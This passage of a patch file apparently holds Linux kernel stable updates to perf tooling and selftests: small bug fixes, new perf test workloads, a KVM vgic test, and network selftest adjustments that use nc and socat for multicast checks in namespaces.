+ The 'p' modifier can be used for specifying how precise the instruction
+ address should be. The 'p' modifier can be specified multiple times:
+diff --git a/tools/perf/bench/inject-buildid.c b/tools/perf/bench/inject-buildid.c
+index 17672790f1231..d1672be702f3b 100644
+--- a/tools/perf/bench/inject-buildid.c
++++ b/tools/perf/bench/inject-buildid.c
+@@ -361,7 +361,7 @@ static int inject_build_id(struct bench_data *data, u64 *max_rss)
+ 		return -1;
+ 
+ 	for (i = 0; i < nr_mmaps; i++) {
+-		int idx = rand() % (nr_dsos - 1);
++		int idx = rand() % nr_dsos;
+ 		struct bench_dso *dso = &dsos[idx];
+ 		u64 timestamp = rand() % 1000000;
+ 
+diff --git a/tools/perf/builtin-annotate.c b/tools/perf/builtin-annotate.c
+index 517d928c00e3f..21d7582608735 100644
+--- a/tools/perf/builtin-annotate.c
++++ b/tools/perf/builtin-annotate.c
+@@ -571,8 +571,6 @@ int cmd_annotate(int argc, const char **argv)
+ 		    "Enable symbol demangling"),
+ 	OPT_BOOLEAN(0, "demangle-kernel", &symbol_conf.demangle_kernel,
+ 		    "Enable kernel symbol demangling"),
+-	OPT_BOOLEAN(0, "group", &symbol_conf.event_group,
+-		    "Show event group information together"),
+ 	OPT_BOOLEAN(0, "show-total-period", &symbol_conf.show_total_period,
+ 		    "Show a column with the sum of periods"),
+ 	OPT_BOOLEAN('n', "show-nr-samples", &symbol_conf.show_nr_samples,
+diff --git a/tools/perf/builtin-daemon.c b/tools/perf/builtin-daemon.c
+index 6cb3f6cc36d0a..35942256582ab 100644
+--- a/tools/perf/builtin-daemon.c
++++ b/tools/perf/builtin-daemon.c
+@@ -523,7 +523,7 @@ static int daemon_session__control(struct daemon_session *session,
+ 		  session->base, SESSION_CONTROL);
+ 
+ 	control = open(control_path, O_WRONLY|O_NONBLOCK);
+-	if (!control)
++	if (control < 0)
+ 		return -1;
+ 
+ 	if (do_ack) {
+@@ -532,7 +532,7 @@ static int daemon_session__control(struct daemon_session *session,
+ 			  session->base, SESSION_ACK);
+ 
+ 		ack = open(ack_path, O_RDONLY, O_NONBLOCK);
+-		if (!ack) {
++		if (ack < 0) {
+ 			close(control);
+ 			return -1;
+ 		}
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index b9b0fda8374e2..ee3a5c4b8251e 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -2843,10 +2843,10 @@ static int __cmd_record(struct record *rec, int argc, const char **argv)
+ 	}
+ #endif
+ 	zstd_fini(&session->zstd_data);
+-	perf_session__delete(session);
+-
+ 	if (!opts->no_bpf_event)
+ 		evlist__stop_sb_thread(rec->sb_evlist);
++
++	perf_session__delete(session);
+ 	return status;
+ }
+ 
+diff --git a/tools/perf/builtin-report.c b/tools/perf/builtin-report.c
+index b6d77d3da64f6..155f119b3db5c 100644
+--- a/tools/perf/builtin-report.c
++++ b/tools/perf/builtin-report.c
+@@ -416,7 +416,7 @@ static int report__setup_sample_type(struct report *rep)
+ 		 * compatibility, set the bit if it's an old perf data file.
+ 		 */
+ 		evlist__for_each_entry(session->evlist, evsel) {
+-			if (strstr(evsel->name, "arm_spe") &&
++			if (strstr(evsel__name(evsel), "arm_spe") &&
+ 				!(sample_type & PERF_SAMPLE_DATA_SRC)) {
+ 				evsel->core.attr.sample_type |= PERF_SAMPLE_DATA_SRC;
+ 				sample_type |= PERF_SAMPLE_DATA_SRC;
+diff --git a/tools/perf/tests/Build b/tools/perf/tests/Build
+index 2064a640facbe..11b69023011b0 100644
+--- a/tools/perf/tests/Build
++++ b/tools/perf/tests/Build
+@@ -103,3 +103,5 @@ endif
+ CFLAGS_attr.o         += -DBINDIR="BUILD_STR($(bindir_SQ))" -DPYTHON="BUILD_STR($(PYTHON_WORD))"
+ CFLAGS_python-use.o   += -DPYTHONPATH="BUILD_STR($(OUTPUT)python)" -DPYTHON="BUILD_STR($(PYTHON_WORD))"
+ CFLAGS_dwarf-unwind.o += -fno-optimize-sibling-calls
++
++perf-y += workloads/
+diff --git a/tools/perf/tests/builtin-test.c b/tools/perf/tests/builtin-test.c
+index 7122eae1d98d9..4c6ae59a4dfd7 100644
+--- a/tools/perf/tests/builtin-test.c
++++ b/tools/perf/tests/builtin-test.c
+@@ -118,6 +118,15 @@ static struct test_suite **tests[] = {
+ 	arch_tests,
+ };
+ 
++static struct test_workload *workloads[] = {
++	&workload__noploop,
++	&workload__thloop,
++	&workload__leafloop,
++	&workload__sqrtloop,
++	&workload__brstack,
++	&workload__datasym,
++};
++
+ static int num_subtests(const struct test_suite *t)
+ {
+ 	int num;
+@@ -475,6 +484,21 @@ static int perf_test__list(int argc, const char **argv)
+ 	return 0;
+ }
+ 
++static int run_workload(const char *work, int argc, const char **argv)
++{
++	unsigned int i = 0;
++	struct test_workload *twl;
++
++	for (i = 0; i < ARRAY_SIZE(workloads); i++) {
++		twl = workloads[i];
++		if (!strcmp(twl->name, work))
++			return twl->func(argc, argv);
++	}
++
++	pr_info("No workload found: %s\n", work);
++	return -1;
++}
++
+ int cmd_test(int argc, const char **argv)
+ {
+ 	const char *test_usage[] = {
+@@ -482,12 +506,14 @@ int cmd_test(int argc, const char **argv)
+ 	NULL,
+ 	};
+ 	const char *skip = NULL;
++	const char *workload = NULL;
+ 	const struct option test_options[] = {
+ 	OPT_STRING('s', "skip", &skip, "tests", "tests to skip"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+ 	OPT_BOOLEAN('F', "dont-fork", &dont_fork,
+ 		    "Do not fork for testcase"),
++	OPT_STRING('w', "workload", &workload, "work", "workload to run for testing"),
+ 	OPT_END()
+ 	};
+ 	const char * const test_subcommands[] = { "list", NULL };
+@@ -504,6 +530,9 @@ int cmd_test(int argc, const char **argv)
+ 	if (argc >= 1 && !strcmp(argv[0], "list"))
+ 		return perf_test__list(argc - 1, argv + 1);
+ 
++	if (workload)
++		return run_workload(workload, argc, argv);
++
+ 	symbol_conf.priv_size = sizeof(int);
+ 	symbol_conf.sort_by_name = true;
+ 	symbol_conf.try_vmlinux_path = true;
+diff --git a/tools/perf/tests/tests.h b/tools/perf/tests/tests.h
+index 5bbb8f6a48fcb..e15f24cfc9094 100644
+--- a/tools/perf/tests/tests.h
++++ b/tools/perf/tests/tests.h
+@@ -180,4 +180,31 @@ int test__arch_unwind_sample(struct perf_sample *sample,
+ DECLARE_SUITE(vectors_page);
+ #endif
+ 
++/*
++ * Define test workloads to be used in test suites.
++ */
++typedef int (*workload_fnptr)(int argc, const char **argv);
++
++struct test_workload {
++	const char	*name;
++	workload_fnptr	func;
++};
++
++#define DECLARE_WORKLOAD(work) \
++	extern struct test_workload workload__##work
++
++#define DEFINE_WORKLOAD(work) \
++struct test_workload workload__##work = {	\
++	.name = #work,				\
++	.func = work,				\
++}
++
++/* The list of test workloads */
++DECLARE_WORKLOAD(noploop);
++DECLARE_WORKLOAD(thloop);
++DECLARE_WORKLOAD(leafloop);
++DECLARE_WORKLOAD(sqrtloop);
++DECLARE_WORKLOAD(brstack);
++DECLARE_WORKLOAD(datasym);
++
+ #endif /* TESTS_H */
+diff --git a/tools/perf/tests/workloads/Build b/tools/perf/tests/workloads/Build
+new file mode 100644
+index 0000000000000..a1f34d5861e36
+--- /dev/null
++++ b/tools/perf/tests/workloads/Build
+@@ -0,0 +1,13 @@
++# SPDX-License-Identifier: GPL-2.0
++
++perf-y += noploop.o
++perf-y += thloop.o
++perf-y += leafloop.o
++perf-y += sqrtloop.o
++perf-y += brstack.o
++perf-y += datasym.o
++
++CFLAGS_sqrtloop.o         = -g -O0 -fno-inline -U_FORTIFY_SOURCE
++CFLAGS_leafloop.o         = -g -O0 -fno-inline -fno-omit-frame-pointer -U_FORTIFY_SOURCE
++CFLAGS_brstack.o          = -g -O0 -fno-inline -U_FORTIFY_SOURCE
++CFLAGS_datasym.o          = -g -O0 -fno-inline -U_FORTIFY_SOURCE
+diff --git a/tools/perf/tests/workloads/brstack.c b/tools/perf/tests/workloads/brstack.c
+new file mode 100644
+index 0000000000000..0b60bd37b9d1a
+--- /dev/null
++++ b/tools/perf/tests/workloads/brstack.c
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include "../tests.h"
++
++#define BENCH_RUNS 999999
++
++static volatile int cnt;
++
++static void brstack_bar(void) {
++}				/* return */
++
++static void brstack_foo(void) {
++	brstack_bar();		/* call */
++}				/* return */
++
++static void brstack_bench(void) {
++	void (*brstack_foo_ind)(void) = brstack_foo;
++
++	if ((cnt++) % 3)	/* branch (cond) */
++		brstack_foo();	/* call */
++	brstack_bar();		/* call */
++	brstack_foo_ind();	/* call (ind) */
++}
++
++static int brstack(int argc, const char **argv)
++{
++	int num_loops = BENCH_RUNS;
++
++	if (argc > 0)
++		num_loops = atoi(argv[0]);
++
++	while (1) {
++		if ((cnt++) > num_loops)
++			break;
++		brstack_bench();/* call */
++	}			/* branch (uncond) */
++	return 0;
++}
++
++DEFINE_WORKLOAD(brstack);
+diff --git a/tools/perf/tests/workloads/datasym.c b/tools/perf/tests/workloads/datasym.c
+new file mode 100644
+index 0000000000000..8e08fc75a973e
+--- /dev/null
++++ b/tools/perf/tests/workloads/datasym.c
+@@ -0,0 +1,40 @@
++#include <linux/compiler.h>
++#include "../tests.h"
++
++typedef struct _buf {
++	char data1;
++	char reserved[55];
++	char data2;
++} buf __attribute__((aligned(64)));
++
++static buf buf1 = {
++	/* to have this in the data section */
++	.reserved[0] = 1,
++};
++
++static int datasym(int argc __maybe_unused, const char **argv __maybe_unused)
++{
++	for (;;) {
++		buf1.data1++;
++		if (buf1.data1 == 123) {
++			/*
++			 * Add some 'noise' in the loop to work around errata
++			 * 1694299 on Arm N1.
++			 *
++			 * Bias exists in SPE sampling which can cause the load
++			 * and store instructions to be skipped entirely. This
++			 * comes and goes randomly depending on the offset the
++			 * linker places the datasym loop at in the Perf binary.
++			 * With an extra branch in the middle of the loop that
++			 * isn't always taken, the instruction stream is no
++			 * longer a continuous repeating pattern that interacts
++			 * badly with the bias.
++			 */
++			buf1.data1++;
++		}
++		buf1.data2 += buf1.data1;
++	}
++	return 0;
++}
++
++DEFINE_WORKLOAD(datasym);
+diff --git a/tools/perf/tests/workloads/leafloop.c b/tools/perf/tests/workloads/leafloop.c
+new file mode 100644
+index 0000000000000..1bf5cc97649b0
+--- /dev/null
++++ b/tools/perf/tests/workloads/leafloop.c
+@@ -0,0 +1,34 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++/* We want to check these symbols in perf script */
++noinline void leaf(volatile int b);
++noinline void parent(volatile int b);
++
++static volatile int a;
++
++noinline void leaf(volatile int b)
++{
++	for (;;)
++		a += b;
++}
++
++noinline void parent(volatile int b)
++{
++	leaf(b);
++}
++
++static int leafloop(int argc, const char **argv)
++{
++	int c = 1;
++
++	if (argc > 0)
++		c = atoi(argv[0]);
++
++	parent(c);
++	return 0;
++}
++
++DEFINE_WORKLOAD(leafloop);
+diff --git a/tools/perf/tests/workloads/noploop.c b/tools/perf/tests/workloads/noploop.c
+new file mode 100644
+index 0000000000000..940ea5910a84c
+--- /dev/null
++++ b/tools/perf/tests/workloads/noploop.c
+@@ -0,0 +1,32 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <stdlib.h>
++#include <signal.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++static int noploop(int argc, const char **argv)
++{
++	int sec = 1;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	while (!done)
++		continue;
++
++	return 0;
++}
++
++DEFINE_WORKLOAD(noploop);
+diff --git a/tools/perf/tests/workloads/sqrtloop.c b/tools/perf/tests/workloads/sqrtloop.c
+new file mode 100644
+index 0000000000000..ccc94c6a6676a
+--- /dev/null
++++ b/tools/perf/tests/workloads/sqrtloop.c
+@@ -0,0 +1,45 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <math.h>
++#include <signal.h>
++#include <stdlib.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include <sys/wait.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++static int __sqrtloop(int sec)
++{
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	while (!done)
++		(void)sqrt(rand());
++	return 0;
++}
++
++static int sqrtloop(int argc, const char **argv)
++{
++	int sec = 1;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	switch (fork()) {
++	case 0:
++		return __sqrtloop(sec);
++	case -1:
++		return -1;
++	default:
++		wait(NULL);
++	}
++	return 0;
++}
++
++DEFINE_WORKLOAD(sqrtloop);
+diff --git a/tools/perf/tests/workloads/thloop.c b/tools/perf/tests/workloads/thloop.c
+new file mode 100644
+index 0000000000000..29193b75717ef
+--- /dev/null
++++ b/tools/perf/tests/workloads/thloop.c
+@@ -0,0 +1,53 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#include <pthread.h>
++#include <stdlib.h>
++#include <signal.h>
++#include <unistd.h>
++#include <linux/compiler.h>
++#include "../tests.h"
++
++static volatile sig_atomic_t done;
++static volatile unsigned count;
++
++/* We want to check this symbol in perf report */
++noinline void test_loop(void);
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
++
++noinline void test_loop(void)
++{
++	while (!done)
++		count++;
++}
++
++static void *thfunc(void *arg)
++{
++	void (*loop_fn)(void) = arg;
++
++	loop_fn();
++	return NULL;
++}
++
++static int thloop(int argc, const char **argv)
++{
++	int sec = 1;
++	pthread_t th;
++
++	if (argc > 0)
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
++
++	pthread_create(&th, NULL, thfunc, test_loop);
++	test_loop();
++	pthread_join(th, NULL);
++
++	return 0;
++}
++
++DEFINE_WORKLOAD(thloop);
+diff --git a/tools/perf/ui/browser.c b/tools/perf/ui/browser.c
+index 78fb01d6ad63f..5d6f4f25c33d0 100644
+--- a/tools/perf/ui/browser.c
++++ b/tools/perf/ui/browser.c
+@@ -203,7 +203,7 @@ void ui_browser__refresh_dimensions(struct ui_browser *browser)
+ void ui_browser__handle_resize(struct ui_browser *browser)
+ {
+ 	ui__refresh_dimensions(false);
+-	ui_browser__show(browser, browser->title, ui_helpline__current);
++	ui_browser__show(browser, browser->title ?: "", ui_helpline__current);
+ 	ui_browser__refresh(browser);
+ }
+ 
+@@ -287,7 +287,8 @@ int ui_browser__show(struct ui_browser *browser, const char *title,
+ 	mutex_lock(&ui__lock);
+ 	__ui_browser__show_title(browser, title);
+ 
+-	browser->title = title;
++	free(browser->title);
++	browser->title = strdup(title);
+ 	zfree(&browser->helpline);
+ 
+ 	va_start(ap, helpline);
+@@ -304,6 +305,7 @@ void ui_browser__hide(struct ui_browser *browser)
+ 	mutex_lock(&ui__lock);
+ 	ui_helpline__pop();
+ 	zfree(&browser->helpline);
++	zfree(&browser->title);
+ 	mutex_unlock(&ui__lock);
+ }
+ 
+diff --git a/tools/perf/ui/browser.h b/tools/perf/ui/browser.h
+index 510ce45540501..6e98d5f8f71cc 100644
+--- a/tools/perf/ui/browser.h
++++ b/tools/perf/ui/browser.h
+@@ -21,7 +21,7 @@ struct ui_browser {
+ 	u8	      extra_title_lines;
+ 	int	      current_color;
+ 	void	      *priv;
+-	const char    *title;
++	char	      *title;
+ 	char	      *helpline;
+ 	const char    *no_samples_msg;
+ 	void 	      (*refresh_dimensions)(struct ui_browser *browser);
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 7145c5890de02..178baa1e69493 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1319,6 +1319,8 @@ static bool intel_pt_fup_event(struct intel_pt_decoder *decoder, bool no_tip)
+ 	bool ret = false;
+ 
+ 	decoder->state.type &= ~INTEL_PT_BRANCH;
++	decoder->state.insn_op = INTEL_PT_OP_OTHER;
++	decoder->state.insn_len = 0;
+ 
+ 	if (decoder->set_fup_cfe_ip || decoder->set_fup_cfe) {
+ 		bool ip = decoder->set_fup_cfe_ip;
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index 6fb64c58b408b..bd09af447eb0d 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -755,6 +755,7 @@ static int intel_pt_walk_next_insn(struct intel_pt_insn *intel_pt_insn,
+ 	bool nr;
+ 
+ 	intel_pt_insn->length = 0;
++	intel_pt_insn->op = INTEL_PT_OP_OTHER;
+ 
+ 	if (to_ip && *ip == to_ip)
+ 		goto out_no_cache;
+@@ -876,6 +877,7 @@ static int intel_pt_walk_next_insn(struct intel_pt_insn *intel_pt_insn,
+ 
+ 			if (to_ip && *ip == to_ip) {
+ 				intel_pt_insn->length = 0;
++				intel_pt_insn->op = INTEL_PT_OP_OTHER;
+ 				goto out_no_cache;
+ 			}
+ 
+diff --git a/tools/perf/util/probe-event.c b/tools/perf/util/probe-event.c
+index 0c24bc7afbca2..66ff8420ce2b0 100644
+--- a/tools/perf/util/probe-event.c
++++ b/tools/perf/util/probe-event.c
+@@ -11,6 +11,7 @@
+ #include <sys/stat.h>
+ #include <fcntl.h>
+ #include <errno.h>
++#include <libgen.h>
+ #include <stdio.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index ef9a3df459657..9053db0dc00a1 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -1162,6 +1162,9 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 
+ 	/* Print metrics headers only */
+ 	evlist__for_each_entry(evlist, counter) {
++		if (config->aggr_mode != AGGR_NONE && counter->metric_leader != counter)
++			continue;
++
+ 		os.evsel = counter;
+ 
+ 		if (!first && config->json_output)
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 1fa4672380a92..9448d075bce20 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -459,6 +459,8 @@ struct nstoken *open_netns(const char *name)
+ 
+ 	return token;
+ fail:
++	if (token->orig_netns_fd != -1)
++		close(token->orig_netns_fd);
+ 	free(token);
+ 	return NULL;
+ }
+diff --git a/tools/testing/selftests/bpf/test_sockmap.c b/tools/testing/selftests/bpf/test_sockmap.c
+index e768181a1bd75..d56f521b8aaa2 100644
+--- a/tools/testing/selftests/bpf/test_sockmap.c
++++ b/tools/testing/selftests/bpf/test_sockmap.c
+@@ -2086,9 +2086,9 @@ int main(int argc, char **argv)
+ 		free(options.whitelist);
+ 	if (options.blacklist)
+ 		free(options.blacklist);
++	close(cg_fd);
+ 	if (cg_created)
+ 		cleanup_cgroup_environment();
+-	close(cg_fd);
+ 	return err;
+ }
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index c2f7cef919c04..eb4c3b4119348 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -3,6 +3,4 @@
+ CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+-binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+-
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/kcmp/kcmp_test.c b/tools/testing/selftests/kcmp/kcmp_test.c
+index 25110c7c0b3ed..d7a8e321bb16b 100644
+--- a/tools/testing/selftests/kcmp/kcmp_test.c
++++ b/tools/testing/selftests/kcmp/kcmp_test.c
+@@ -91,7 +91,7 @@ int main(int argc, char **argv)
+ 		ksft_print_header();
+ 		ksft_set_plan(3);
+ 
+-		fd2 = open(kpath, O_RDWR, 0644);
++		fd2 = open(kpath, O_RDWR);
+ 		if (fd2 < 0) {
+ 			perror("Can't open file");
+ 			ksft_exit_fail();
+diff --git a/tools/testing/selftests/kvm/aarch64/vgic_init.c b/tools/testing/selftests/kvm/aarch64/vgic_init.c
+index 9c131d977a1b5..e43536a76b78a 100644
+--- a/tools/testing/selftests/kvm/aarch64/vgic_init.c
++++ b/tools/testing/selftests/kvm/aarch64/vgic_init.c
+@@ -6,6 +6,7 @@
+  */
+ #define _GNU_SOURCE
+ #include <linux/kernel.h>
++#include <linux/bitfield.h>
+ #include <sys/syscall.h>
+ #include <asm/kvm.h>
+ #include <asm/kvm_para.h>
+@@ -86,6 +87,18 @@ static struct vm_gic vm_gic_create_with_vcpus(uint32_t gic_dev_type,
+ 	return v;
+ }
+ 
++static struct vm_gic vm_gic_create_barebones(uint32_t gic_dev_type)
++{
++	struct vm_gic v;
++
++	v.gic_dev_type = gic_dev_type;
++	v.vm = vm_create_barebones();
++	v.gic_fd = kvm_create_device(v.vm, gic_dev_type);
++
++	return v;
++}
++
++
+ static void vm_gic_destroy(struct vm_gic *v)
+ {
+ 	close(v->gic_fd);
+@@ -359,6 +372,40 @@ static void test_vcpus_then_vgic(uint32_t gic_dev_type)
+ 	vm_gic_destroy(&v);
+ }
+ 
++#define KVM_VGIC_V2_ATTR(offset, cpu) \
++	(FIELD_PREP(KVM_DEV_ARM_VGIC_OFFSET_MASK, offset) | \
++	 FIELD_PREP(KVM_DEV_ARM_VGIC_CPUID_MASK, cpu))
++
++#define GIC_CPU_CTRL	0x00
++
++static void test_v2_uaccess_cpuif_no_vcpus(void)
++{
++	struct vm_gic v;
++	u64 val = 0;
++	int ret;
++
++	v = vm_gic_create_barebones(KVM_DEV_TYPE_ARM_VGIC_V2);
++	subtest_dist_rdist(&v);
++
++	ret = __kvm_has_device_attr(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0));
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++	ret = __kvm_device_attr_get(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0), &val);
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++	ret = __kvm_device_attr_set(v.gic_fd, KVM_DEV_ARM_VGIC_GRP_CPU_REGS,
++				    KVM_VGIC_V2_ATTR(GIC_CPU_CTRL, 0), &val);
++	TEST_ASSERT(ret && errno == EINVAL,
++		    "accessed non-existent CPU interface, want errno: %i",
++		    EINVAL);
++
++	vm_gic_destroy(&v);
++}
++
+ static void test_v3_new_redist_regions(void)
+ {
+ 	struct kvm_vcpu *vcpus[NR_VCPUS];
+@@ -677,6 +724,9 @@ void run_tests(uint32_t gic_dev_type)
+ 	test_vcpus_then_vgic(gic_dev_type);
+ 	test_vgic_then_vcpus(gic_dev_type);
+ 
++	if (VGIC_DEV_IS_V2(gic_dev_type))
++		test_v2_uaccess_cpuif_no_vcpus();
++
+ 	if (VGIC_DEV_IS_V3(gic_dev_type)) {
+ 		test_v3_new_redist_regions();
+ 		test_v3_typer_accesses();
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index aa646e0661f36..a8f0442a36bca 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -7,6 +7,8 @@ else ifneq ($(filter -%,$(LLVM)),)
+ LLVM_SUFFIX := $(LLVM)
+ endif
+ 
++CLANG := $(LLVM_PREFIX)clang$(LLVM_SUFFIX)
++
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
+@@ -18,7 +20,13 @@ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+-CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
++
++# Default to host architecture if ARCH is not explicitly given.
++ifeq ($(ARCH),)
++CLANG_TARGET_FLAGS := $(shell $(CLANG) -print-target-triple)
++else
++CLANG_TARGET_FLAGS := $(CLANG_TARGET_FLAGS_$(ARCH))
++endif
+ 
+ ifeq ($(CROSS_COMPILE),)
+ ifeq ($(CLANG_TARGET_FLAGS),)
+@@ -30,7 +38,7 @@ else
+ CLANG_FLAGS     += --target=$(notdir $(CROSS_COMPILE:%-=%))
+ endif # CROSS_COMPILE
+ 
+-CC := $(LLVM_PREFIX)clang$(LLVM_SUFFIX) $(CLANG_FLAGS) -fintegrated-as
++CC := $(CLANG) $(CLANG_FLAGS) -fintegrated-as
+ else
+ CC := $(CROSS_COMPILE)gcc
+ endif # LLVM
+diff --git a/tools/testing/selftests/net/amt.sh b/tools/testing/selftests/net/amt.sh
+index 75528788cb95e..7e7ed6c558da9 100755
+--- a/tools/testing/selftests/net/amt.sh
++++ b/tools/testing/selftests/net/amt.sh
+@@ -77,6 +77,7 @@ readonly LISTENER=$(mktemp -u listener-XXXXXXXX)
+ readonly GATEWAY=$(mktemp -u gateway-XXXXXXXX)
+ readonly RELAY=$(mktemp -u relay-XXXXXXXX)
+ readonly SOURCE=$(mktemp -u source-XXXXXXXX)
++readonly SMCROUTEDIR="$(mktemp -d)"
+ ERR=4
+ err=0
+ 
+@@ -85,6 +86,11 @@ exit_cleanup()
+ 	for ns in "$@"; do
+ 		ip netns delete "${ns}" 2>/dev/null || true
+ 	done
++	if [ -f "$SMCROUTEDIR/amt.pid" ]; then
++		smcpid=$(< $SMCROUTEDIR/amt.pid)
++		kill $smcpid
++	fi
++	rm -rf $SMCROUTEDIR
+ 
+ 	exit $ERR
+ }
+@@ -167,7 +173,7 @@ setup_iptables()
+ 
+ setup_mcast_routing()
+ {
+-	ip netns exec "${RELAY}" smcrouted
++	ip netns exec "${RELAY}" smcrouted -P $SMCROUTEDIR/amt.pid
+ 	ip netns exec "${RELAY}" smcroutectl a relay_src \
+ 		172.17.0.2 239.0.0.1 amtr
+ 	ip netns exec "${RELAY}" smcroutectl a relay_src \
+@@ -210,8 +216,8 @@ check_features()
+ 
+ test_ipv4_forward()
+ {
+-	RESULT4=$(ip netns exec "${LISTENER}" nc -w 1 -l -u 239.0.0.1 4000)
+-	if [ "$RESULT4" == "172.17.0.2" ]; then
++	RESULT4=$(ip netns exec "${LISTENER}" timeout 15 socat - UDP4-LISTEN:4000,readbytes=128 || true)
++	if echo "$RESULT4" | grep -q "172.17.0.2"; then
+ 		printf "TEST: %-60s  [ OK ]\n" "IPv4 amt multicast forwarding"
+ 		exit 0
+ 	else
+@@ -222,8 +228,8 @@ test_ipv4_forward()
+ 
+ test_ipv6_forward()
+ {
+-	RESULT6=$(ip netns exec "${LISTENER}" nc -w 1 -l -u ff0e::5:6 6000)
+-	if [ "$RESULT6" == "2001:db8:3::2" ]; then
++	RESULT6=$(ip netns exec "${LISTENER}" timeout 15 socat - UDP6-LISTEN:6000,readbytes=128 || true)
++	if echo "$RESULT6" | grep -q "2001:db8:3::2"; then
+ 		printf "TEST: %-60s  [ OK ]\n" "IPv6 amt multicast forwarding"
+ 		exit 0
+ 	else
+@@ -236,14 +242,14 @@ send_mcast4()
+ {
+ 	sleep 2
+ 	ip netns exec "${SOURCE}" bash -c \
+-		'echo 172.17.0.2 | nc -w 1 -u 239.0.0.1 4000' &
++		'printf "%s %128s" 172.17.0.2 | nc -w 1 -u 239.0.0.1 4000' &
+ }
+ 
+ send_mcast6()
+ {
+ 	sleep 2
+ 	ip netns exec "${SOURCE}" bash -c \
+-		'echo 2001:db8:3::2 | nc -w 1 -u ff0e::5:6 6000' &
++		'printf "%s %128s" 2001:db8:3::2 | nc -w 1 -u ff0e::5:6 6000' &
+ }
+ 
+ check_features
+diff --git a/tools/testing/selftests/net/forwarding/bridge_igmp.sh b/tools/testing/selftests/net/forwarding/bridge_igmp.sh
+index 1162836f8f329..6dc3cb4ac6081 100755
+--- a/tools/testing/selftests/net/forwarding/bridge_igmp.sh
++++ b/tools/testing/selftests/net/forwarding/bridge_igmp.sh
+@@ -481,10 +481,10 @@ v3exc_timeout_test()
+ 	RET=0
+ 	local X=("192.0.2.20" "192.0.2.30")
+ 
+-	# GMI should be 3 seconds
++	# GMI should be 5 seconds
+ 	ip link set dev br0 type bridge mcast_query_interval 100 \
+ 					mcast_query_response_interval 100 \
+-					mcast_membership_interval 300
++					mcast_membership_interval 500
+ 
+ 	v3exclude_prepare $h1 $ALL_MAC $ALL_GROUP
+ 	ip link set dev br0 type bridge mcast_query_interval 500 \
+@@ -492,7 +492,7 @@ v3exc_timeout_test()
+ 					mcast_membership_interval 1500
+ 
+ 	$MZ $h1 -c 1 -b $ALL_MAC -B $ALL_GROUP -t ip "proto=2,p=$MZPKT_ALLOW2" -q
+-	sleep 3
++	sleep 5
+ 	bridge -j -d -s mdb show dev br0 \
+ 		| jq -e ".[].mdb[] | \
+ 			 select(.grp == \"$TEST_GROUP\" and \
